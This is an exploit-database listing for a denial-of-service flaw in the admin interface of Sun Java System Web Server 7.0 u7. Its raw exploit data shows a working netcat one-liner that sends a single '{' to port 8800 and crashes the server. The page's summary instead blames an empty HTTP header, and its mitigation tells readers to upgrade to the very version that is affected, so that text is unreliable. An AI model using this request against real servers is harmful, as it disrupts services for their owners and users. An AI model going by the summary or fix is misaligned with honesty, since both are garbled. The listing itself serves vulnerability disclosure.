Sun Java Web Sever 7.0 u7 Admin Interface DOS

vendor:

Java System Web Server

by:

Unknown

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Java System Web Server

Affected Version From: 7.0 u7

Affected Version To: 7.0 u7

Patch Exists: Yes

Related CWE: N/A

CPE: a:sun:java_system_web_server:7.0u7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Sun Java Web Sever 7.0 u7 Admin Interface DOS

A Denial of Service (DoS) vulnerability exists in Sun Java Web Server 7.0 u7, which allows an attacker to cause a denial of service by sending a specially crafted HTTP request. The request must contain an empty HTTP header, which causes the server to crash.

Mitigation:

Upgrade to the latest version of Sun Java Web Server 7.0 u7 or later.

Source

Exploit-DB raw data:

# Sun Java Web Sever 7.0 u7 Admin Interface DOS

# Software Package sjsws-7_0u7-windows-i586.zip 4fb8d1fb700d5649234a2891a4ecedea
# While attempting to verify http://www.exploit-db.com/exploits/14194/ (which was not verified),
# I stumbled across this semi amusing DOS:

root@bt:~# nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 06 Jul 2010 00:22:50 GMT
Content-type: text/html
Last-modified: Tue, 06 Jul 2010 00:18:00 GMT
Content-length: 465
Etag: "1d1-4c327638"
Accept-ranges: bytes
Connection: close

root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) open
root@bt:~# echo { |nc -nv 192.168.48.134 8800
(UNKNOWN) [192.168.48.134] 8800 (?) : Connection refused
root@bt:~#